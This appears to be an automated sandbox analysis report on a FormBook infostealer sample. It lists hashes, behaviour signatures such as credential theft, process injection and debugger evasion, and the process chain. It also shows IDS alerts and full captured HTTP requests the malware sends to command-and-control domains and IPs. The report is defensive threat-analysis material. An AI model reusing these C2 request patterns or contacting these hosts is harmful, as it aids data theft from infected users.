Windows Analysis Report
z6tNjJC614.exe

Overview

General Information

Sample name: z6tNjJC614.exe (renamed because original name is a hash value)
Original sample name: 2d6f1128b6b15116c20d67315344e79aaece8d0a636f2ddae9936b1949188dde.exe
Analysis ID: 1588990
MD5: 043a47d412717c236558774c700bb159
SHA1: bb9aada716669988693a17d9c559e683b194a5d1
SHA256: 2d6f1128b6b15116c20d67315344e79aaece8d0a636f2ddae9936b1949188dde
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • z6tNjJC614.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\z6tNjJC614.exe" MD5: 043A47D412717C236558774C700BB159)
    • svchost.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\z6tNjJC614.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • tFEgkRNveR.exe (PID: 6908 cmdline: "C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winver.exe (PID: 7628 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)
          • firefox.exe (PID: 7828 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
8.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                 Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Program Files\Mozilla Firefox\Firefox.exe", CommandLine: "C:\Program Files\Mozilla Firefox\Firefox.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Mozilla Firefox\firefox.exe, NewProcessName: C:\Program Files\Mozilla Firefox\firefox.exe, OriginalFileName: C:\Program Files\Mozilla Firefox\firefox.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 7628, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files\Mozilla Firefox\Firefox.exe", ProcessId: 7828, ProcessName: firefox.exe
                 Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\z6tNjJC614.exe", CommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", ParentImage: C:\Users\user\Desktop\z6tNjJC614.exe, ParentProcessId: 7128, ParentProcessName: z6tNjJC614.exe, ProcessCommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", ProcessId: 7304, ProcessName: svchost.exe
                 Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\z6tNjJC614.exe", CommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", ParentImage: C:\Users\user\Desktop\z6tNjJC614.exe, ParentProcessId: 7128, ParentProcessName: z6tNjJC614.exe, ProcessCommandLine: "C:\Users\user\Desktop\z6tNjJC614.exe", ProcessId: 7304, ProcessName: svchost.exe
                 Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                 2025-01-11T08:16:42.756658+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49972 | 154.205.156.26 | 80 | TCP
                 2025-01-11T08:17:07.189292+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49977 | 47.76.213.197 | 80 | TCP
                 2025-01-11T08:17:20.955304+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49981 | 74.48.143.82 | 80 | TCP
                 2025-01-11T08:17:34.104111+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49985 | 13.248.169.48 | 80 | TCP
                 2025-01-11T08:17:48.016406+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49989 | 103.21.221.87 | 80 | TCP
                 2025-01-11T08:18:02.476469+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49993 | 8.218.14.120 | 80 | TCP
                 2025-01-11T08:18:15.759713+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49997 | 203.161.43.228 | 80 | TCP
                 2025-01-11T08:18:28.913120+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50001 | 13.248.169.48 | 80 | TCP
                 2025-01-11T08:18:42.699338+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 50005 | 147.255.21.187 | 80 | TCP
                 Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                 2025-01-11T08:15:40.434176+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50008 | 104.21.42.77 | 80 | TCP
                 2025-01-11T08:16:59.497328+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49973 | 47.76.213.197 | 80 | TCP
                 2025-01-11T08:17:02.081515+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49974 | 47.76.213.197 | 80 | TCP
                 2025-01-11T08:17:04.638978+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49976 | 47.76.213.197 | 80 | TCP
                 2025-01-11T08:17:13.306462+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49978 | 74.48.143.82 | 80 | TCP
                 2025-01-11T08:17:15.868025+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49979 | 74.48.143.82 | 80 | TCP
                 2025-01-11T08:17:18.395884+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49980 | 74.48.143.82 | 80 | TCP
                 2025-01-11T08:17:26.456079+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49982 | 13.248.169.48 | 80 | TCP
                 2025-01-11T08:17:29.005833+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49983 | 13.248.169.48 | 80 | TCP
                 2025-01-11T08:17:31.571928+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49984 | 13.248.169.48 | 80 | TCP
                 2025-01-11T08:17:40.319273+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49986 | 103.21.221.87 | 80 | TCP
                 2025-01-11T08:17:42.840779+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49987 | 103.21.221.87 | 80 | TCP
                 2025-01-11T08:17:45.392008+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49988 | 103.21.221.87 | 80 | TCP
                 2025-01-11T08:17:54.627543+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49990 | 8.218.14.120 | 80 | TCP
                 2025-01-11T08:17:57.228314+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49991 | 8.218.14.120 | 80 | TCP
                 2025-01-11T08:17:59.919440+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49992 | 8.218.14.120 | 80 | TCP
                 2025-01-11T08:18:08.097844+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49994 | 203.161.43.228 | 80 | TCP
                 2025-01-11T08:18:10.670064+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49995 | 203.161.43.228 | 80 | TCP
                 2025-01-11T08:18:13.227092+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49996 | 203.161.43.228 | 80 | TCP
                 2025-01-11T08:18:21.267075+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49998 | 13.248.169.48 | 80 | TCP
                 2025-01-11T08:18:23.809027+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49999 | 13.248.169.48 | 80 | TCP
                 2025-01-11T08:18:26.381532+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50000 | 13.248.169.48 | 80 | TCP
                 2025-01-11T08:18:35.081560+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50002 | 147.255.21.187 | 80 | TCP
                 2025-01-11T08:18:37.633844+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50003 | 147.255.21.187 | 80 | TCP
                 2025-01-11T08:18:40.173449+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50004 | 147.255.21.187 | 80 | TCP
                 2025-01-11T08:18:49.281777+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50006 | 104.21.42.77 | 80 | TCP
                 2025-01-11T08:18:51.841588+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 50007 | 104.21.42.77 | 80 | TCP

                AV Detection

                 Source: z6tNjJC614.exe | ReversingLabs: Detection: 83%
                 Source: z6tNjJC614.exe | Virustotal: Detection: 66%
                 Source: Yara match | File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                 Source: Yara match | File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                 Source: Yara match | File source: 0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                 Source: Yara match | File source: 0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                 Source: Yara match | File source: 0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                 Source: Yara match | File source: 00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                 Source: Yara match | File source: 00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                 Source: Yara match | File source: 0000000C.00000002.3127852915.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                 Source: Yara match | File source: 00000008.00000002.1635105463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                 Source: Yara match | File source: 0000000C.00000002.3124391485.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                 Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                 Source: z6tNjJC614.exe | Joe Sandbox ML: detected
                 Source: z6tNjJC614.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winver.pdb source: svchost.exe, 00000008.00000003.1603996002.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1603347613.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000003.1707352600.0000000000DAF000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tFEgkRNveR.exe, 0000000B.00000002.3124395582.000000000017E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: z6tNjJC614.exe, 00000000.00000003.1297611024.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, z6tNjJC614.exe, 00000000.00000003.1296227096.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1538115679.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1536377388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1635461967.0000000004154000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.000000000464E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1638229083.0000000004304000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: z6tNjJC614.exe, 00000000.00000003.1297611024.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, z6tNjJC614.exe, 00000000.00000003.1296227096.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000003.1538115679.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1536377388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1635478765.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, winver.exe, 0000000C.00000002.3128325549.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1635461967.0000000004154000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 0000000C.00000002.3128325549.000000000464E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 0000000C.00000003.1638229083.0000000004304000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000008.00000003.1603996002.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1603347613.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tFEgkRNveR.exe, 0000000B.00000003.1707352600.0000000000DAF000.00000004.00000001.00020000.00000000.sdmp
                 Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057445A GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_0057445A
                 Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057C6D1 FindFirstFileW,FindClose, | 0_2_0057C6D1
                 Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_0057C75C
                 Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_0057EF95
                 Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_0057F0F2
                 Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_0057F3F3
                 Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_005737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_005737EF
                 Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00573B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_00573B12
                 Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_0057BCBC
                 Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_004AC740 FindFirstFileW,FindNextFileW,FindClose, | 12_2_004AC740
                 Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 4x nop then pop edi | 11_2_086F8AEE
                 Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 4x nop then pop edi | 11_2_086FAAFC
                 Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 4x nop then xor eax, eax | 11_2_086FE309
                 Source: C:\Windows\SysWOW64\winver.exe | Code function: 4x nop then xor eax, eax | 12_2_00499E10
                 Source: C:\Windows\SysWOW64\winver.exe | Code function: 4x nop then mov ebx, 00000004h | 12_2_042904E8

                Networking

                 Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49977 -> 47.76.213.197:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49973 -> 47.76.213.197:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 203.161.43.228:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 13.248.169.48:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 203.161.43.228:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 147.255.21.187:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 8.218.14.120:80
                 Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49997 -> 203.161.43.228:80
                 Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49972 -> 154.205.156.26:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 74.48.143.82:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 8.218.14.120:80
                 Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49985 -> 13.248.169.48:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 8.218.14.120:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 74.48.143.82:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 103.21.221.87:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 13.248.169.48:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50007 -> 104.21.42.77:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 47.76.213.197:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 74.48.143.82:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 47.76.213.197:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 13.248.169.48:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 203.161.43.228:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50004 -> 147.255.21.187:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50003 -> 147.255.21.187:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 103.21.221.87:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 13.248.169.48:80
                 Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49989 -> 103.21.221.87:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 103.21.221.87:80
                 Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50001 -> 13.248.169.48:80
                 Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49981 -> 74.48.143.82:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 13.248.169.48:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 104.21.42.77:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 13.248.169.48:80
                 Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49993 -> 8.218.14.120:80
                 Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50005 -> 147.255.21.187:80
                 Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50008 -> 104.21.42.77:80
                Source: DNS query: www.fortevision.xyz
                Source: DNS query: www.rtpterbaruwaktu3.xyz
                Source: DNS query: www.tals.xyz
                 Source: Joe Sandbox View | IP Address: 203.161.43.228
                 Source: Joe Sandbox View | IP Address: 13.248.169.48
                 Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVNPTCorpVN
                 Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                 Source: Joe Sandbox View | ASN Name: LINKNET-ID-APLinknetASNID
                 Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                 Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_005822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, | 0_2_005822EE
                 Source: global traffic | HTTP traffic detected:
                     GET /z9pi/?QbUPL=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipuFwHgdvcemFSrMC8OxCAm29CGPtG+jrBp7iHLTW/uD4KAmAXSCgHgFK4&ef4=TJYXELnhFJhl HTTP/1.1
                     Host: www.jijievo.site
                     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                     Accept-Language: en-US,en;q=0.5
                     Connection: close
                     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                 Source: global traffic | HTTP traffic detected:
                     GET /8qt7/?QbUPL=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXiJxWYm89PNrsVDefynVEbypj6mz/ajpHDG/8Uzc6QbTSEQ6i7rwMVRjg&ef4=TJYXELnhFJhl HTTP/1.1
                     Host: www.ytsd88.top
                     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                     Accept-Language: en-US,en;q=0.5
                     Connection: close
                     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                 Source: global traffic | HTTP traffic detected:
                     GET /mlxg/?QbUPL=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGraedJXjbbCkeYoQqBrGkjzfTHxGy2G2a4+AXnGm9DtiGGRVBQ2NqOGZfd&ef4=TJYXELnhFJhl HTTP/1.1
                     Host: www.bpgroup.site
                     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                     Accept-Language: en-US,en;q=0.5
                     Connection: close
                     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                 Source: global traffic | HTTP traffic detected:
                     GET /dash/?ef4=TJYXELnhFJhl&QbUPL=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q1LAgUq3XcZwqztHS/MhxxHRy56C3xMKSUemxfPW4qvYN+c3Gdt63iP8z HTTP/1.1
                     Host: www.fortevision.xyz
                     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
